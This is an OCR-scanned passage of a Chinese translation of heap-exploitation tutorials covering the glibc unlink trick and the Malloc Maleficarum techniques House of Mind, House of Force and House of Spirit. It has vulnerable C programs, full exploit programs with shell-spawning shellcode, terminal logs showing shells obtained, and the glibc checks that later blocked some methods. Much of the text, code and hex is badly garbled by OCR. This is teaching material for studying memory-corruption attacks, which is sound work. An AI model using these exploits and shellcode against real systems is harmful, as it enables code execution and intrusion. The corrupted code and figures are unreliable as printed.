memcpy( p, shellcode, strlen(shellcode) ); 

p += strlen( shellcode ); 

/* Padding- 16 bytes for prev size,size,fd and bk of sec 
ond chunk. 16 bytes for fd,bk,fd nextsize,bk nextsize 

of first chunk */ 

memset( p, 'B', (680 - 4*4) - (4*4 + strlen(shellcode)) 
); 

p += ( 680 - 4*4) - ( 4*4 + strlen(shellcode) ); 

/* the prev_size field of the second chunk. Just make su 
re its an even number ie) its prev_inuse bit is unset */ 

*( (size t *)p ) = (size t)( DUMMY & ~PREV_INUSE ); 

p += 4; 

/* the size field of the second chunk. By setting size t 
o -4, we trick glibc malloc to unlink second chunk.*/ 

*( (size t *)p ) = (size_t)( -4 ); 

p += 4; 

/* the fd field of the second chunk. It should point to 
free - 12. -12 is required since unlink function 

would do + 12 (FD->bk). This helps to overwrite the GOT 
entry of free with the address we have overwritten in 

second chunk's bk field (see below) */ 


*( (void **)p ) = (void *)( FUNCTION POINTER - 12 ); 

p += 4; 

/* the bk field of the second chunk. It should point to 
shell code address.*/ 

*( (void **)p ) = (void *)( CODE ADDRESS ); 


p += 4; 
/* the terminating NUL character */ 
kn — Il. 
p= , 


/* the execution of the vulnerable program */ 
execve( argv[0], argv, NULL ); 
return( -1 ); 


执行 上 述 程序 会 派生 新 的 shell» 


sploitfunQsploitfun-VirtualBox:-/lsploits/hof/unlink$ gcc -g -z 
norelro -z execstack -o vuln vuln.c -Wl, --rpath=/home/sploitfun/ 
glibc/glibc-inst2.20/lib -Wl,--dynamic-linker-/home/sploitfun/gl 
ibc/glibc-inst2.20/lib/ld-linux.so.2 
sploitfunQsploitfun-VirtualBox:-/lsploits/hof/unlink$ gcc -g -o 
exp exp.c 

sploitfunQsploitfun-VirtualBox:-/lsploits/hof/unlink$ ./exp 

$ ls 

cmd exp exp.c vuln vuln.c 

$ exit 

sploitfunQsploitfun-VirtualBox:-/lsploits/hof/unlink$ 


保护 : 现在 ，unlink 技巧 不 起 作用 了 ， 因 为 glibc malloc 4E 3€ ILE Ee BT 3E 9 HB 
加 下 面 的 检查 来 放置 使 用 unlink 技巧 的 堆 溢出 。 


e 二 次 释放 : 释放 一 个 已 经 在 空闲 列表 的 块 是 不 允许 的 。 当 攻击 者 使 用 -4 履 盖 
第 二 个 块 时 ， 它 的 PREV INUSE 为 没有 设置 ， 这 意味 着 first 已 经 是 空闲 状 
态 了 。 因 此 glibc malloc 会 抛 出 二 次 释放 错误 。 


if (__glibc_unlikely (!prev inuse(nextchunk))) 
{ 


errstr = "double free or corruption (!prev)"; 
goto errout; 


e 下 一 个 块 大 小 无 效 : 下 一 个 块 的 大 小 应 该 在 8 到 arena 的 全 部 系统 内 存 之 间 。 
当 攻 击 者 将 second 块 的 大 小 赋 为 -4 时 ，glibc malloc 就 会 抛 出 下 一 个 块 大 小 
无 效 的 错误 。 


if ( builtin expect (nextchunk->size <= 2 * SIZE SZ, 0) 
|| | builtin expect (nextsize >= av-»system mem, ©)) 
{ 


errstr = "free(): invalid next size (normal)"; 
goto errout; 


e 双向 链表 指针 破坏 : 前 一 个 块 的 fd 和 下 一 个 块 的 bk 应 该 指向 当前 unlink 
块 。 当 攻击 者 使 用 free -12 和 shellcode EE 
& fd 和 bk 时 ，free 和 shellcode 地 址 + 8 就 不 会 指向 当前 unlink 块 
( second ) ° A% glibc malloc 就 抛 出 双向 链表 指针 破坏 错误 。 
if ( builtin expect (FD->bk !- P || BK->fd !- P, 0)) 


malloc printerr (check action, "corrupted double-linked 
«Sp Ry 
注意 : 出 于 演示 目的 ， 漏 洞 程 序 不 适用 下 列 Linunx 保护 机 制 编 译 : 
e ASLR 


e NX 
e RELRO ( $€ € 6 Aix) 


e vudo malloc tricks 


使 用 Malloc Maleficarum 的 堆 溢 出 


HA : 飞龙 

原文 : Heap overflow using Malloc Maleficarum 
预备 条 件 : 

1. 理解 glibc malloc 


从 2004 年 末 开 始 ，glibc malloc 变 得 更 可 靠 了 。 之 后 ， 类 似 unlink 的 技巧 已 经 废 
弃 ， 攻 击 者 没有 线索 。 但 是 在 2005 年 末 ，Phantasmal Phatasmagoria 带 来 了 下 面 
这 些 技巧 ， 用 于 成 功利 用 堆 溢出 。 


House of Prime 
House of Mind 
House of Force 
House of Lore 
House of Spirit 


House of Mind 


这 个 技巧 中 ， 攻 击 者 欺骗 glibc malloc 来 使 用 由 他 伪造 的 arena。 伪 造 的 arena 以 
这 种 形式 构造 ，unsorted bin 的 fd 包含 free 的 GOT 条 目地 址 -12。 因 此 现在 当 
漏洞 程序 释放 某 个 块 的 时 候 ， free 的 GOT 条 目 被 覆盖 为 shellcode 的 地 址 。 在 
RAK GOT 之 后 ， 当 漏洞 程序 调用 free > shellcode 就 会 执行 。 


预备 条 件 : 下 面 是 成 功 应 用 House of Mind 的 预备 条 件 ， 因 为 不 是 所 有 扒 溢出 漏洞 
程序 都 可 以 使 用 这 个 技巧 来 利用 。 


1. 在 块 的 地 址 之 前 ， 需 要 一 系列 malloc 调用 -- 当 对 齐 到 内 存 区 域 
中 HEAP MAX SIZE 结果 的 倍数 的 时 候 ， 内 存 区 域 由 攻击 者 控制 。 这 是 伪造 
的 heap info 结构 所 在 的 内 存 区 域 。 伪 造 的 heap info 的 arena 48 
^t ar ptr 会 指向 伪造 的 arena。 因 此 伪造 的 arena 和 伪造 的 heap info 的 
内 存 区 域 都 能 由 攻击 者 控制 。 


2. 一 个 块 ， 它 的 大 小 字段 (以 及 它 的 arena 指针 -- 预备 条 件 1) 由 攻击 者 控制 ， 
应 该 已 释放 。 


3. 上 述 空闲 块 的 下 一 个 块 应 该 不 是 top 块 。 
漏洞 程序 : 这 个 程序 满足 上 述 预备 条 件 。 


使 用 Malloc Maleficarum 49 + H4 


A VN E 
House of Mind vulnerable program 
hy 


include <stdio.h> 
Zinclude <stdlib.h> 


int main (void) { 

char *ptr - malloc(1024); /* First allocated chunk */ 
char *ptr2; /* Second chunk/Last but one chunk */ 
charti ptrs / Last chunk *7 

int heap = (int)ptr & OXxFFF00000; 

_Bool found = 0; 

ine 115.27 


For (12, 1 = 1924; it) 4 
/* Prereq 1: Series of malloc calls until a chunk's address - 
when aligned to HEAP MAX SIZE results in 0x08100000 */ 
/* 0x08100000 is the place where fake heap info structure is 
found. */ 
E BE 
if (!found && (((int)(ptr2 = malloc(1024)) & OxFFF00000) == 
(heap + 0x100000))) { 
printf("good heap allignment found on malloc() %i (%p)\n", 
i, ptr2); 
found = 1; 
break; 


} 


} 

TE 

ptr3 - malloc(1024); /* Last chunk. Prereq 3: Next chunk to ptr 
2 !- av->top */ 

7 » USER Inputs, 7% 

ELE 

fread (ptr, 1024 * 1024, 1, stdin), 


ATE 

free(ptr2); /* Prereq 2: Freeing a chunk whose size and its are 
na pointer is controlled by the attacker. */ 

el KC E) 

free(ptr3); /* Shell code execution. */ 

return(0); /* Bye */ 
} 


上 述 漏洞 程序 的 堆 内 存 : 
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使 用 Malloc Maleficarum $528 3; H4 


0x806b000 
0x8100aa8 
0x81006a0 
0x8100298 

Ox80ff690 
0x804a408 

Heap Memory 
of 
Vulnerable 
Program 

0x804a000 


漏洞 程序 的 行 [3] 是 堆 溢 出 发 生 的 地 方 。 用 户 输入 储存 在 块 1 的 mem 指针 处 ， 
大 小 共计 1MB。 所 以 为 了 成 功利 用 堆 溢 出 ， 攻 击 者 提供 了 下 面 的 用 户 输入 ( 列 出 顺 
序 相 同 ) 。 


伪造 的 arena 

垃圾 数据 

伪造 的 heap info 
Shellcode 


利用 程序 : 这 个 程序 生成 了 攻击 者 的 数据 文件 : 


7 expec 
Program to generate attacker data. 
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使 用 Malloc Maleficarum 的 堆 溢 出 


Command : 

#./exp > file 
27 
#include <stdio.h> 


#define BIN1 Oxb7fd8430 


char scode[] = 

/* Shellcode to execute linux command "id". Size - 72 bytes. */ 
"NX31NXC9NX83NXe9NxfANxd9NxeeNxd9Nx74NX24NXfANXBbNX81NX73NX13NX5 
e" 

"NXC9ONX6aNx42NX83NxebNxfcNxe2NXxf ANXSANXC2NX32NxdbNxOcNxaf NX02Nx6 
m 
"\x3d\xA40\x8d\x2a\x71\xba\x02\x42\Xx36\XEe6\X08\X2b\Xx3O\XAO\X89I\X1 
o" 
"\xb6\xc5\x6a\x42\x5e\xe6\x1f\x31\x2c\xe6\x08\x2b\x30\xe6\x03\x2 
6" 

"\x5e\x9e\x39\xcb\xbf\x04\xea\x42"; 


char ret str[4] = "\x00\x00\x00\x00"; 


void convert endianess(int arg) 


{ D . 
int 1=0; 
ret_str[3] = (arg & OxFF000000) >> 24; 
ret str[2] = (arg & 0x00FF0000) >> 16; 
ret str[1] = (arg & 0x0000FF00) >> 8; 
ret str[0] = (arg & 0x000000FF) >> 0; 


int main() { 
int i-0,j-0; 


fwrate("\x4d\x41\x41\x4i"> 4, 1, stdout); 7* fd "7 
fwrite("\x41\x41\x41\x41", SEOOUC) 7 DKL 
fwrite("\x41\x41\x41\x41", 4, 1, stdout); 7^ fd nextsize 


assy 
FS 


A 
fwrite("\x41\x41\x41\x41", 4, 1, stdout); /* bk nextsize 
ud 
/* Fake Arena. */ 
fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* mutex */ 
fwrite(" NxOTXXOONXOONXOO", 4, 1, stdout); / flag “7 
for(i=0;1<10; i++) 
fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* fas 
EDAN SNE 
fwrite("\xbO\xOe\x10\x0s", 4, 1, stdout); /* top */ 
fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* last remain 
der */ 


for(i=0;i<127;i++) { 
convert_endianess(BIN1+(i*8)); 
if(i == 119) { 
fwrite("\x0O0\x00\x00\x00", 4, 1, stdout) 
; /* preserve prev size */ 
fwrite("Nx09Nx04Nx00Nx00", 4, 1, stdout) 
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使 用 Malloc Maleficarum 的 堆 溢 出 


GE 


preserve size */ 
) else if(i--0) ( 
fwrite("\xe8\x98\x04\x08", 4, 


1, stdout) 


; /* bins[i][0] = (GOT(free) - 12) */ 
fwrite(ret str, 4, 1, stdout); /* bins[i 
17 
} 
else ( 
fwrite(ret str, 4, 1, stdout); /* bins[i 
SZ 
fwrite(ret_str, 4, 1, stdout); /* bins[i 
heel ag 
} 
} 
for(i=0;i<4;i++) { 
fwrite("\x0O0\x00\x00\x00", 4, 1, stdout); /* bin 
map[i] */ 
} 
fwrite xxOO0NxBAXXxfdNxb7", 4, 1, stdout); V^ next *7 
fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* next free */ 
fwrite("\x00\x60\x0c\x00", 4, 1, stdout); /* system mem 
D 
fwrite("\x00\x60\x0c\x00", 4, 1, stdout); /* max system _ 
mem */ 
for(i=0;1<234;i++) { 
fwrite("\x41\x41\x41\x41", 4, 1, stdout); /* PAD 
ki 
} 
for(i=0;i<722;i++) { 
if(i--721) { 
/* Chunk 724 contains the shellcode. */ 
fwrite("NxebNx18Nx00Nx00", 4, 1, stdout) 
; /* prev size - Jmp 24 bytes */ 
fwrite("\xOd\x04\x00\x00", 4, 1, stdout) 
Saft eg zer 
fwrite("\x0O0\x00\x00\x00", 4, 1, stdout) 
/fl A 
fwrite("\x00\x00\x00\x00", 4, 1, stdout) 
ee) ce gs 
fwrite("\x00\x00\x00\x00", 4, 1, stdout) 
= /* Tdlmextsize- *7 
fwrite("Nx0ONx00Nx0O0Nx0O", 4, 1, stdout) 


\ 


bk nextsize */ 


fwrite("Nx90Nx90NX90NXx90NX90NXx90NXx90Nx90" 


"NX90NX90NX90NX90NX90NX90NX90NX90", 16, 1 


„ stdout) 7* NOPS *7 


fwrite(scode, sizeof(scode)-1, 1, stdout 


7 SHELECODE, 77 


for (j=0; j<230; j++) 


fwrite("\x42\x42\x42\x42", 4, 1, 


Stdout) 7 PAD */ 
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使 用 Malloc Maleficarum 5538 7 H 


continue; 
L else { 
fwrite("Nx0ONx00Nx0OONx0OO", 4, 1, stdout) 
; /* prev size */ 
fwrite("Nx09Nx04Nx00Nx00", 4, 1, stdout) 
EE 


} 
if(i==720) { 
for (j=0;j<90; j++) 
fwrite("\x42\x42\x42\x42", 4, 1, 
SECOUL) 7/7 PADE: 7 
fwrite("\x18\xa0\x04\x08", 4, 1, stdout) 
; /* Arena Pointer */ 
for(j=0;j<165;j++) 
fwrite("\x42\x42\x42\x42", 4, 1, 
stdout); /* PAD */ 
L else { 
for(j=0;j<256;j++) 
fwrite("\x42\x42\x42\x42", 4, 1, 
stdout) 7 (PAD *7 
} 
} 


return o; 


d Y[ VV Qo v €€€—— 80341 


汤 洞 程序 的 堆 内 存 ， 在 攻击 者 生成 数据 作为 用 户 输入 之 后 : 
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使 用 Malloc Maleficarum 49 + 7 H 


0x806b000 


0x8100aa8 


0x81006a0 


0x8100298 


0x8100000 


Ox80ff690 


Heap Memory 
of 
Vulnerable 
Program 
with 
attacker 

data 0x804a000 


0x804a408 


0x804a018 





在 攻击 者 生成 数据 作为 用 户 输入 之 后 ，glibc malloc 执行 下 列 事情 ， 当 漏洞 程序 的 
行 [4] 执行 时 : 


e 正在 释放 的 堆 的 arena 由 访问 arena for chunk 获取 。 

o arena for chunk : 如 果 没 有 设置 NON_MAIN_ARENA (N) 位 ， 会 返回 
i arena。 如 果 设 置 了 ， 会 通过 将 块 地 址 对 齐 到 HEAP MAX SIZE 的 倍 
数 ， 来 访问 相应 的 heap info 结构 。 之 后 ， 获 取 到 的 heap info 结构 
的 arena 指针 会 返回 。 我 们 这 里 ， NON. MAIN ARENA 位 由 攻击 者 设置 ， 
此 会 获取 正在 释放 的 块 的 heap info 结构 ( 0x08100000 ) 。 攻 击 者 也 
Bay (所 获取 的 heap info 结构 的 ) arena 指针 ， 使 其 指向 伪造 的 
arena， 也 就 是 说 ， heap info 的 ar ptr 等 于 伪造 的 arena 的 基 址 
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( 0x0804a018 ) 。 
e 使 用 arena 指针 和 块 地 址 作为 参数 调用 int free 。 我 们 这 里 ，arena 指针 
指向 了 伪造 的 arena。 因 此 伪造 的 arena 和 块 地 址 作为 参数 传递 给 
了 _int free >» 
o 伪造 的 arena: 下 面 是 伪造 区 域 的 受 控 字段 ， 需 要 由 攻击 者 覆盖 : 
Mutex - 应 该 为 unlocked 状态 。 
Bins - unsorted bin 的 fd 应 该 包含 free % GOT 条 目地 址 。 
Top - Top 地 址 应 该 不 等 于 正在 释放 的 块 地址 。 
系统 内 存 - 系统 内 存 应 该 大 于 下 一 个 块 大 小 。 
o int free() 
m 如 果 块 不 是 mmap 分 配 的 ， 要 获取 锁 。 我 们 这 里 块 不 是 mmap 分 配 
a) » 4324 arena 的 互 不 锁 获 取 成 功 。 
| 合并 
m 查看 上 一 个 块 是 否 空闲 ， 如 果 空 闲 则 人 合并。 我们 这 里 上 一 个 块 已 
分 配 ， 所 以 不 能 向 后 合并 。 
m 查看 下 一 个 块 是 否 空闲 ， 如 果 空 闲 则 合并 。 我 们 这 里 下 一 个 块 已 
分 配 ， 所 以 不 能 合并 。 
m 将 当前 空闲 块 放 进 unsorted bin 中 。 我 们 这 里 伪造 的 arena 的 
unsorted bin 的 fd 包含 free 的 GOT 条 目地 址 -12， 它 被 复制 给 
了 fwd 值 。 之 后 ， 当 前 空 用 快 的 地 址 会 复制 给 fwd->bk 。 bk 位 
于 malloc chunk 偏 移 12 处 ， 因 此 ，12 会 加 到 fwd 值 ， 也 就 
是 free - 12 + 12 。 所 以 现在 free 的 GOT 条 目 会 变 为 当前 空 
闲 块 的 地 址 。 由 于 攻击 者 已 经 将 他 的 shellcode 放 进 当前 空闲 块 了 ， 
现在 开始 ， 无 论 何 时 调用 free ， 攻 击 者 的 shellcode 都 会 执行 。 


使 用 攻击 者 生成 的 数据 文件 ， 作 为 用 户 输入 执行 漏洞 程序 会 执行 shellcode， 像 这 
样 : 


sploitfunQsploitfun-VirtualBox:-/lsploits/hof/hom$ gcc -g -z nor 
elro -z execstack -o vuln vuln.c -Wl, --rpath=/home/sploitfun/gli 
bc/glibc-inst2.20/lib -Wl,--dynamic-linker-/home/sploitfun/glibc 
/glibc-inst2.20/1lib/ld-linux.so.2 
sploitfunQsploitfun-VirtualBox:-/lsploits/hof/hom$ gcc -g -o exp 
exp.c 
sploitfunQsploitfun-VirtualBox:-/lsploits/hof/hom$ ./exp > file 
sploitfunQsploitfun-VirtualBox:-/lsploits/hof/hom$ ./vuln « file 
ptr found at 0x804a008 
good heap allignment found on malloc() 724 (0x81002a0) 
uid-1000(sploitfun) gid-1000(sploitfun) groups-1000(sploitfun),4 
(adm), 24(cdrom), 27(sudo), 30(dip),46(plugdev),109(lpadmin),124(sa 
mbashare) 


保护 : MA » house of mind 技术 不 起 作用 了 ， 因 为 glibc malloc 已 经 变 得 更 加 可 
靠 。 它 添加 了 下 面 的 检查 来 防止 使 用 house of mind 的 堆 溢 出 。 


e 块 破坏 : unsorted bin 的 第 一 个 块 的 bk 指针 应 该 指向 unsorted bin。 如 果 不 
x > glibc malloc 会 抛 出 块 破坏 错误 。 


if (. glibc unlikely (fwd->bk != bck)) 
i 


errstr - "free(): corrupted unsorted chunks"; 
goto errout; 


House of Force 


这 个 技巧 中 ， 攻 击 者 滥用 top 块 的 大 小 ， 并 欺骗 glibc malloc 使 用 top 块 来 服务 于 
一 个 非常 大 的 内 存 请 求 (大 于 堆 系统 内 存 大 小 ) 。 现 在 当 新 的 malloc 请 求 产生 

时 ， free 的 GOT 表 就 会 覆盖 为 shellcode 地 址 。 因 此 从 现在 开始 ， 无 

i& free 何 时 调用 ，shellcode 都 会 执行 。 


预备 条 件 : 为 了 成 功 应 用 house of force， 需 要 下 面 三 个 malloc 调用 : 


e Malloc 1 : 攻击 者 应 该 能 够 控制 top 块 的 大 小 。 因 此 这 个 分 配 的 块 ， 也 就 是 物 
理 上 在 top 块 之 前 的 块 上 ， 应 该 能 产生 堆 溢出 。 

e Malloc 2 : 攻击 者 应 该 能 够 控制 malloc 请 求 的 大 小 。 

e Malloc 3 : 用 户 输入 应 该 能 复制 到 这 个 所 分 配 的 块 中 。 


漏洞 程序 : 这 个 程序 满足 上 述 要 求 


使 用 Malloc Maleficarum 8528 zi d 


[fe 

House of force vulnerable program. 
7 

#include <stdio.h> 

#include <stdlib.h> 

#include <string.h> 


int main(int argc, char *argv[]) 


{ 
char *buf1, *buf2, *buf3; 
if (argc != 4) { 
printf ("Usage Error\n"); 
return; 
} 
el Du) EE 
bufi = malloc(256); 
A215 % 
strcpy(buf1, argv[1]); 7* Prereq 1 *7 
71810 2% 
buf2 = malloc(strtoul(argv[2], NULL, 16)); /* Prereq 2 */ 
S I: en 
buf3 = malloc(256); /* Prereq 3 */ 
xs qe 
strcpy(buf3, argv[3]); /* Prereq 3 */ 
Le el 
free(buf3); 
free(buf2); 
free(buf1); 
return OF 
} 
II 
上 述 漏 洞 程序 的 堆 内 存 : 
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使 用 Malloc Maleficarum $528 3; H4 


0x806b000 

0x804a318 

0x804a210 

Heap Memory 
of 0x804a108 
x a 
Vulnerable 
Program 
NOTE: Chunk 2 size is 0x804a000 


assumed to be 256 bytes. 


漏洞 程序 的 行 [2] 是 扒 溢出 发 生 的 地 方 。 因 此 为 了 成 功利 用 扒 溢 出 ， 攻 击 者 需要 
提供 下 面 的 命令 行 参 数 : 
e argv[1] -- 需要 复制 到 第 一 个 malloc 块 的 shellcode + 填充 + top 块 大 小 。 
e argv[2] -- 第 二 个 malloc 块 的 大 小 参数 。 


大 大 一 


e argv[3] -- 复制 到 第 三 个 malloc 块 的 用 户 输入 。 
利用 程序 : 
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/* Program to exploit executable 'vuln' using hof technique. 
9% 

#include <stdio.h> 

#include <unistd.h> 

#include <string.h> 


#define VULNERABLE "./vuln" 

#define FREE_ADDRESS 0x08049858-0x8 
#define MALLOC SIZE "OxFFFFF744" 
define BUFS USER INP "\x08\xa0\x04\x08" 


/* Spawn a shell. Size - 25 bytes. */ 
char scode[] - 

"NX31NXCONXBONX68NX2fNX2fNX73NX68NX68NX2fT NX62NX69NXx6eNx8 
9Nxe3Nx5ONX89Nxe2NXx53Nx89Nxe1NxbONxObNxcdNx80" ; 


int main( void ) 
i D . 

int 1; 

chan =p: 

char argvi[ 265 ]; 

char * argv[] = { VULNERABLE, argvi, MALLOC_SIZE, BUF3_U 
SER_INP, NULL }; 


strcpy(argvi, scode); 
for (i=25;1<260; i++) 
argv1[I] = AU 


strepy(argv1+260, "\xFF\xFF\xFF\xFF"); /* Top chunk size 


ix 
argv[264] = ''; /* Terminating NULL character */ 
/* Execution of the vulnerable program */ 
execve( argv[0], argv, NULL ); 
return( -1 ); 

} 


漏洞 程序 的 扒 内 存 ， 一 旦 攻击 者 的 命令 行 参数 复制 到 堆 中 : 


使 用 Malloc Maleficarum 8528 xi de 


0x8049958 


frees GOT entry ——————*  0x8049858 


0x8049850 


Heap Memory + 
GOT segment 
of 
Vulnerable 
Program 
with 
attacker 

arguments 0x804a000 


0x804a108 





使 用 攻击 者 的 参数 ， 下 面 的 事情 会 发 生 : 
行 [2] 会 覆盖 top 块 大 小 : 
e 攻击 者 的 参数 ( argv[1] - Shellcode + Pad + OxFFFFFFFF ) 会 复制 到 堆 
缓冲 区 buf1 。 但 是 由 于 argv[1] 大 于 256，top 块 的 大 小 会 覆盖 
为 OxFFFFFFFF ° 
行 [3] 使 用 top 块 代码 ， 分 配 了 一 个 非常 大 的 块 。 
e 非常 大 的 块 的 分 配 请 求 发 生 在 分 配 之 后 ， 新 的 top 块 应 该 位 于 free 的 GOT 
条 目 之 前 8 个 字 节 处 。 所 以 另 一 个 malloc 请 求 (ir [4] ) 会 帮助 我 们 履 
盖 free 的 GOT 地 址 。 
e 攻击 者 的 参数 ( argv[2] - 9xFFFFF744 ) 会 作为 大 小 参数 ， 传 递 给 第 二 个 
malloc 调用 (fr [3] ) 。 大 小 参数 使 用 下 面 的 公式 计算 : 
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o 


size - ((free-8)-top) 
o 其 中 
m free 是 可 执行 文件 vuln 的 GOT 条 目 ， 也 就 
是 free = 0x08049858 。 
= top 是 当前 top 块 (在 第 一 个 malloc [1] 之后) ， 也 就 
是 top = 0x0804a108 ° 
o 因 
此 size = ((0x8049858-0x8)-0x804a108) = -8B8 = OxFFFFF748 > 
o 当 size = OxFFFFF748 时 ， 我 们 的 任务 ， 将 新 的 top 块 放置 在 free 的 
GOT 条 目 之 前 8 个 字 节 处 ， 像 这 样 完 成 了 : 
m (OXFFFFF748+0x804a108) = 0x08049850 = (0x08049858-0x8) 
o 但 是 ， 当 攻击 者 传递 大 小 参数 OxFFFFF748 时 ，glibc malloc 将 这 个 大 小 
转换 为 可 用 大 小 9xFFFFF759 。 因 此 ， 现 在 新 的 top 块 大 小 应 该 位 
于 0x8049858 而 不 是 0x8049850 。 因 此 攻击 者 应 该 传 
递 0xFFFFF744 作为 大 小 参数 ， 而 不 是 9xFFFFF748 ， 因 为 他 会 转换 为 
我 们 所 需 的 可 用 的 大 小 9xFFFFF748 ° 


Ae? : 


e 现在 由 于 行 [3] 中 的 top 块 指 向 0x8049850 ， 一 个 256 字 节 的 内 存 分 配 请 
求 会 使 glibc malloc 返回 0x8049858 ， 他 会 复制 到 buf3 。 


ATR? : 


将 buf1 的 地 址 复制 给 buf3 ， 会 导致 GOT Æ ž ° Ast free 的 调用 
( 行 [6] ) 会 导致 shellcode 执行 。 


使 用 攻击 者 的 命令 行 参数 执行 漏洞 程序 ， 会 执行 shellcode， 像 这 样 : 


sploitfunQsploitfun-VirtualBox:-/lsploits/hof/hof$ gcc -g -z nor 
elro -z execstack -o vuln vuln.c -Wl, --rpath=/home/sploitfun/gli 
bc/glibc-inst2.20/lib -Wl,--dynamic-linker-/home/sploitfun/glibc 
/glibc-inst2.20/1lib/ld-linux.so.2 
sploitfunQsploitfun-VirtualBox:-/lsploits/hof/hof$ gcc -g -o exp 
exp.c 

sploitfunQsploitfun-VirtualBox:-/lsploits/hof/hof$ ./exp 

$ ls 

cmd exp exp.c vuln vuln.c 

$ exit 

sploitfunQsploitfun-VirtualBox:-/lsploits/hof/hof$ 


保护 : 直到 现在 ， 没 有 添加 针对 这 个 技巧 的 任何 保护 。 这 个 技巧 能 帮助 我 们 利用 堆 
溢出 ， 即 使 它 使 用 最 新 的 glibc 编译 。 


House of Spirit 


E > 攻击 者 欺骗 glibc malloc 来 返回 一 个 块 ， 它 位 于 栈 中 (而 不 是 堆 
F) 。 这 允许 攻击 者 覆盖 储存 在 栈 中 的 返回 地 址 。 


预备 条 件 : 下 面 是 用 于 成 功利 用 house of spirit 的 预备 条 件 ， 因 为 不 是 所 有 堆 溢 出 
漏洞 程序 都 可 以 使 用 这 个 技巧 利用 。 


。 一 个 缓冲 区 溢出 ， 用 于 履 盖 一 个 变量 ， 它 包含 块 地 址 ， 由 glibc malloc 返回 。 

. a EE 够 控制 这 个 空 闪 块 的 大 小 。 它 以 这 种 方 
式 控制 ， 空 闲 块 的 大 小 等 于 下 一 个 分 配 块 的 大 小 。 

e Malloc 一 个 块 。 

e 用 户 输入 应 该 能 够 复制 到 上 面 所 分 配 的 块 中 。 


漏洞 程序 : 这 个 程序 满足 上 述 要 求 


A VON ete 

House of Spirit vulnerable program 
e? 

#include <stdio.h> 

#include <stdlib.h> 

#include <string.h> 


void fvuln(char *stri, int age) 
{ 
char *ptri, name[44]; 
int local_age; 
char *ptr2; 
[1]local_age = age; /* Prereq 2 */ 


[2]ptri = (char *) malloc(256); 
printfio xnPTRT-— [Xp 7 ptr). 
[3]strcpy(name, stri); /* Prereq 1 */ 
printf("\nPTR1 = [ %p ]\n", ptr1); 
[4]free(ptr1); /* Prereq 2 */ 


[5]ptr2 = (char *) malloc(40); /* Prereq 3 */ 
[6]snprintf(ptr2, 40-1, "%s is %d years old", name, local age 
); /* Prereq 4 ^/ 
printf("NnwsNn' s ptr2); 
} 


int maıin(ant-arge, char argin 
D 

int 1-0; 

int stud class[10]; /* Required since nextchunk size should 
lie in between 8 and arena's system mem. */ 

for(i=0;i<10;i++) 

[7]stud class[i] = 10; 
if (argc -- 3) 
fvuln(argv[1], 25); 
return or 


使 用 Malloc Maleficarum 8528 3; H4 


上 述 漏洞 程序 的 栈 布局 : 


Oxbffffe54 


EBP ——» Oxbffffdf8 

Oxbffffdf4 

OxbffffdfO 

Oxbffffdec 

Oxbffffde8 

Oxbffffde4 

OxbffffdeO 

Stack Layout 
of Oxbffffdb8 
Vulnerable 


Program 
ESP __. Oxbffffd90 





漏洞 程序 的 行 [3] 是 缓冲 区 溢出 发 生 处 。 因 此 为 了 成 功利 用 漏洞 程序 ， 攻 击 者 需 
要 提供 下 面 的 命令 行 参数 : 


argv[1] = Shell Code + Stack Address + Chunk size 


利用 程序 : 
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/* Program to exploit executable 'vuln' using hos technique. 
9% 

#include <stdio.h> 

#include <unistd.h> 

#include <string.h> 


#define VULNERABLE "./vuln" 


/* Shellcode to spwan a shell. Size: 48 bytes - Includes Return 

Address overwrite */ 

char scode[] = 
"\xeb\xOe\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xb8\xf 

d\xff\xbf\x31\xcO\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x8 

9Nxe3NxX5ONX89Nxe2Nx53Nx89Nxed1NxbONxObNxcdNx80Nx90Nx90NXx90NX90NXx9 

ONx90Nx90" ; 


int main( void ) 
{ 
int 1; 
chan =p 
char argv1[54]; 
char * argv[] = { VULNERABLE, argvi, NULL }; 


strcpy(argvi, scode); 

/* Overwrite ptri in vuln with stack address - Oxbffffdf 
©. Overwrite local age in vuln with chunk size - 0x30 */ 

strcpy(argv1-48, "NxfONxfaNxffNxbfNx30"); 

argv[53] = ''; 

/* Execution of the vulnerable program */ 


execve( argv[0], argv, NULL ); 
return( -1 ); 


使 用 攻击 者 的 参数 之 后 ， 上 述 漏洞 程序 的 栈 布局 : 


使 用 Malloc Maleficarum $528 3; H4 


Oxbffffe54 Oxbffffe54 


EBP ——» Oxbffffdf8 EBP ——» Oxbffffdf8 


Oxbffffdf4 Oxbffffdf4 
OxbffffdfO OxbffffdfO 
Oxbffffdec Oxbffffdec 
Oxbffffde8 Oxbffffde8 





Oxbffffde4 
OxbffffdeO 


Oxbffffde4 
OxbffffdeO 


name —— Oxbffffdb8 name — —9- Oxbffffdb8 


ESP __2 Oxbffffd90 ESP __2 Oxbffffd90 





Stack Layout with attacker data Stack Layout with attacker data 
after strcpy of vuln.c after snprintf of vuln.c 


eA ae NBR 1h A A E GR AER 
^ [3] :缓冲 区 溢出 


e 这 里 攻击 者 的 输入 argv[1] 复制 到 了 字符 缓冲 区 name 中 。 因 为 攻击 者 的 输 
AKF 44° € € ptri 和 loacl age 被 栈 地 址 和 块 大 小 履 盖 。 
o 栈 地 址 ( OxbffffdfO ) -- 447 [5] 执行 时 ， 攻 击 者 欺骗 glibc malloc 
来 返回 这 个 地 址 。 
o 块 大 小 ( 0x30 ) -- Sir [4] 执行 时 ， 这 个 块 大 小 用 于 欺骗 glibc 
malloc ° 


ff [4] : 将 栈 区 域 添加 到 glibc malloc 的 fastbin 中 。 
e free() AMT int free() 。 现 在 在 缕 冲 区 溢出 之 
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E: ptri = OxbffffdfO (而 不 是 9x804aa08 ) °- KHAN ptrı 作为 参 
数 传递 给 free 。 这 欺骗 glibc malloc 来 释放 栈 上 的 内 存 区 域 。 被 释放 的 这 个 
栈 区 域 的 大 小 ， 位 于 ptr1-8+4 ， 被 攻击 者 覆盖 为 0x30 。 因 此 glibc malloc 
将 这 个 块 看 做 fast (AA 48 < 64 ) ， 并 将 释放 得 快 插入 fast binlist 的 前 
面 ， 位 于 下 标 4。 


行 [5] : 获取 (在 行 [4] 添加 的 ) RER 


e malloc 请 求 40 由 checked request2size 转换 为 可 用 大 小 48。 由 于 可 用 代 
